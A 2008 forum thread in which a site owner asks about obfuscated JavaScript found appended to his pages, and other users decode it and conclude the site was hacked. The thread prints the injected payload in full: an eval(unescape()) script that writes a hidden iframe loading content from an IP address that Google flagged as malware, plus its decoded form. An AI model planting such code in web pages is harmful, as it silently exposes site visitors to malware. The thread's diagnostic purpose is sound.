Explain some javascript code

**KevinADC** · Feb 8 '08, 10:58 PM

I think maybe my browser is adding this javascript, I use Mozilla FireFox 2.0.0.9 with Adblock Plus installed. But if anyone has any insight I would appreciate it.

**mrhoo** · Feb 9 '08, 12:28 AM

It's a hidden iframe that (apparently) hosts a hit-counter script on your page.
Maybe it is paid advertising- it is an old script.
check out the whosis for http:// 81.29.241.70

**KevinADC** · Feb 9 '08, 03:26 AM

whois reports no matches for that IP address. I have never used any ads or hit counters on the website or that webpage. The javascript was not there when the file was uploaded several months ago. I see something similar appended to another page on the same site:

Code:

<html>
<head>
<title>Beas Party Ponies Image Gallery</title>
<link rel="shortcut icon" href="../favicon.ico" >
</head>
<frameset rows="*" name="main" framespacing="0" border="0">
    <frame src="content.shtml" name="display" scrolling="yes" frameborder="no" name="display" marginwidth="0" marginheight="0">
</frameset>
</html><script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%38%65%38%31%38%36%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%38%31%2e%32%39%2e%32%34%31%2e%37%30%2f%6e%65%77%2f%63%6f%75%6e%74%65%72%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%37%34%38%38%30%29%2b%27%30%39%37%30%34%30%36%66%64%36%30%5c%27%20%77%69%64%74%68%3d%34%38%30%20%68%65%69%67%68%74%3d%31%35%36%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>

**KevinADC** · Feb 9 '08, 03:39 AM

google is reporting pages with that script as malware that may harm your computer.

**acoder** · Feb 9 '08, 09:10 AM

Originally posted by KevinADC

I see something similar appended to another page on the same site:

This one is similar:
[code=javascript]window.status=' Done';document. write('<iframe name=8e8186 src=\'http://81.29.241.70/new/counter.php?'+M ath.round(Math. random()*74880) +'0970406fd60\' width=480 height=156 style=\'display : none\'></iframe>')[/code]To find this for yourself, use two textareas - one for the input of the escaped text and the other for the output. Then unescape the value of the input using unescape() or you could use something like this.

I think you should ask your host why this script has been added.

**KevinADC** · Feb 9 '08, 07:15 PM

Originally posted by acoder

This one is similar:
[code=javascript]window.status=' Done';document. write('<iframe name=8e8186 src=\'http://81.29.241.70/new/counter.php?'+M ath.round(Math. random()*74880) +'0970406fd60\' width=480 height=156 style=\'display : none\'></iframe>')[/code]To find this for yourself, use two textareas - one for the input of the escaped text and the other for the output. Then unescape the value of the input using unescape() or you could use something like this.

I think you should ask your host why this script has been added.

I have contacted the host. They are investigating because it appears the site was hacked and this code was added to index.xxx pages and a few other pages.

Thanks.

**acoder** · Feb 9 '08, 07:59 PM

Originally posted by KevinADC

I have contacted the host. They are investigating because it appears the site was hacked and this code was added to index.xxx pages and a few other pages.

Thanks.

That should explain it. At least you seem to have got to the bottom of it.

Explain some javascript code

Explain some javascript code

Comment

Comment

Comment

Comment

Comment

Comment

Comment